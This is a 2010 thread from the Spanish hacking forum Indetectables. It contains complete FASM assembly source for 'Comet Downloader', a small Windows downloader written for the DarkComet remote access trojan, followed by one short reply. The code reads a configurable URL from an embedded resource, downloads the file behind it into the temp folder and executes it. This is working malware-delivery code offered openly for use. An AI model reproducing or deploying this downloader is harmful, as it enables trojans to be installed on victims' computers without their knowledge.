Indetectables

Indetectables es una Comunidad de Hacking, Seguridad Informática, Impresión 3d y Desarrollo
./index.php?sid=838d078ccc96c262341f1e7bfcd80df6

CometDownloader (ASM)

https://indetectables.net/viewtopic.php?t=27401

Página 1 de 1

CometDownloader (ASM)

Publicado: 30 Sep 2010, 19:31
por Kodeinfect

Código: Seleccionar todo

;-----------------------------------;
;     Comet Downloader [FASM]      -;
; Author : DarkCoderSc             -;
; Mail : [email protected]  -;
;----------------------------------------------------------------------;
; Size = 2048o (2ko)                                                  -;
; Server Editor include it will read the ressource %URL% in RT_RCDATA -;
; This sample example will be use on DarkComet-RAT !                  -;
;----------------------------------------------------------------------;

Format PE GUI 4.0

entry start  

include 'c:\FASMW168\include\win32a.inc'

;Var data section rw-------------------------------------
section '.data' data readable writeable 

;Const Values--------------------
CMD_OPEN   db 'open',0
filep      db 'tmp.exe',0
;Unknow values-------------------
handle     dd ?
hRes       dd ?
hReturn    dd ?
sRes       dd ?
pRes       dd ?
Res        db ?
SzBuf      dd ?
;Server Editor Values------------
RC_STR0    db '%URL%',0
TmpDir     rb 256d
;--------------
url        db ?
path       db ?

;Code section--------------------------------------------
section '.code' code readable executable

;Entry point---------------------------------------------
start:
     invoke GetModuleHandle,0
     mov [handle],eax
     ;Server Settings n1---------------------------------
     invoke FindResource,NULL,RC_STR0,RT_RCDATA
     mov [hRes],eax
     invoke LoadResource,NULL,[hRes]
     mov [hReturn],eax
     invoke SizeofResource,NULL,[hRes]
     mov [sRes],eax
     invoke LockResource,[hReturn]
     mov [pRes],eax
     invoke movememory,url,[pRes],[sRes]
     invoke FreeResource,[hReturn]
     xor eax, eax
     ;Finally call the download process------------------
     invoke GetTempPath,TmpDir,TmpDir
     ;Create The Final Path------------------------------
     invoke strcat,TmpDir,filep
     ;Now Download---------------------------------------
     invoke DeleteFile,TmpDir
     invoke URLDownloadToFile,0,url,TmpDir,0,NULL
     invoke ShellExecute,0,CMD_OPEN,TmpDir,0,0,SW_SHOW
exit:
     invoke ExitProcess,0

;Import data section-------------------------------------
section '.idata' import data readable

;Dll names-------------------------------
library urlmon,'URLMON.DLL',\
        Shell32,'SHELL32.DLL',\
        Kernel32,'KERNEL32.DLL',\
        User32,'USER32.DLL'

import urlmon,\
       URLDownloadToFile,'URLDownloadToFileA'

import Shell32,\
       ShellExecute,'ShellExecuteA'

import Kernel32,\
       GetModuleHandle,'GetModuleHandleA',\
       FindResource,'FindResourceA',\
       LoadResource,'LoadResource',\
       SizeofResource,'SizeofResource',\
       LockResource,'LockResource',\
       lstrcpy,'lstrcpy',\
       ExitProcess,'ExitProcess',\
       movememory,'RtlMoveMemory',\
       FreeResource,'FreeResource',\
       ZeroMemory,'RtlZeroMemory',\
       strcat,'lstrcat',\
       GetTempPath,'GetTempPathA',\
       DeleteFile,'DeleteFileA'

import User32,\
       MessageBox,'MessageBoxA'

Re: CometDownloader (ASM)

Publicado: 01 Oct 2010, 17:15
por linkgl
Es básicamente un downloader con puras apis y almacena los datos en el res! xD
Todos los horarios son UTC+02:00
Página 1 de 1

© Indetectables Team

Desarrollado por Indetectables LAB